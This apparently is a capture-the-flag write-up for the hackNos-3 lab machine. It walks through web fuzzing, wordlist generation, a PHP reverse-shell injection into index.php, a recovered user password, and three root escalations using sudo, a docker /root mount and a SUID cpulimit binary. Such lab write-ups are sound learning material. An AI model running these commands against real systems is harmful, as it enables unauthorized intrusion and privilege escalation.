Last updated: 15 Apr 24 09:30:56 (UTC)

Write-Up HackNos-3

hackNos 3

By Lawcky 03/01/2024

Introduction

Flag: 2 Flag first user and the second root

Flag: 2 Flag first user And the second root

Learning: Web Application | Enumeration | Privilege Escalation

Difficulty : Medium

Additionnal info :

Name: hackNos: Os-hackNos-3
Release date: 14 Dec 2019
Author: Rahul Gehlaut
Series: hackNos

|NOTE| if you want to see all the scans we wont copy them here as they would be way too voluminous, click here to see them

In this write-up

Write-UP

Fuzzing

ffuf -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt:FUZZ -u http://192.168.1.65/FUZZ

also tried “.txt” “.html” “.FUZZ” “.FUZZ.txt”

found :
/devil
/websec

Getting first access

reading through the website on /websec/
we know the
contact@hacknos.com mail
and using cewl we get a wordlist based on the website

cewl -d 2 http://192.168.1.65 -w websec.dic

with this we found the account :
contact@hacknos.com:Securityx

Looking for RCE

7f59cfd52dda41ba51074740b384bfe3.png
rce ===> exploit-db

we go to the file manager and inject the php code to the index.php page, everytime the default page is open a reverse shell connection will be sent.

93b541b1f5a12f3fecf24e1a0e8a909e.png

Privilege Escalation

0c49ff1b77641909e7b777b0f8efbe6b.png
got first flag

Linux Enumeration

we run linpeas

found a unknown service on a high port
fa016fba3e48f46f1deaa26da1d64253.png

blackdevil user has a lot of groups that could be easily used for privilege escalation
fcd4783a5bd270cb5bf6f31b52008fd6.png

5cd9b55938e1eb828b4810b6fff4dd14.png

to verify it we can run the command

find / -perm -4000 2>/dev/null

3e4158ebe60b14d5a5e0ba0b74458a92.png

===> gtfo

but we need the user’s password to do so.

the port 35563 is a mysql server, after looking we find this:

7015674da252dae0be960ee940454a51.png

Mysql

SELECT * FROM ost_staff;

003aac0e8b6a4e838beeb3a644075ef7.png

ef9c615efcea903c17d6c21f85b97953.png

none of it worked
the answer:
cat /var/local/database

4ab94b02b211db9b99782fb68b4ce88a.png

run this through a ‘fakesheet decoder’ (it didnt even work for me)

which then gives :

blackdevil:Security@x@

Privilege Escalation

there are at least 3 ways to get root

since the default privilege escalation is very easy

First Way

sudo su

caaa36b150fc716f309d803067e84bad.png

Second Way

using dockers

docker run -v /root/:/mnt -it alpine

3b4a58bba92982a81cd7443209b1affd.png

Third Way

using SUID

the cpulimiter binairy has a set of SUID that allows it to be used for Privesc

sudo install -m =xs $(which cpulimit) .

./cpulimit -l 100 -f -- /bin/sh -p

b0e488689a7c761784f8a3a3a9208ac2.png

Joplin Server v2.14.2, copyright © 2021-2024 JOPLIN.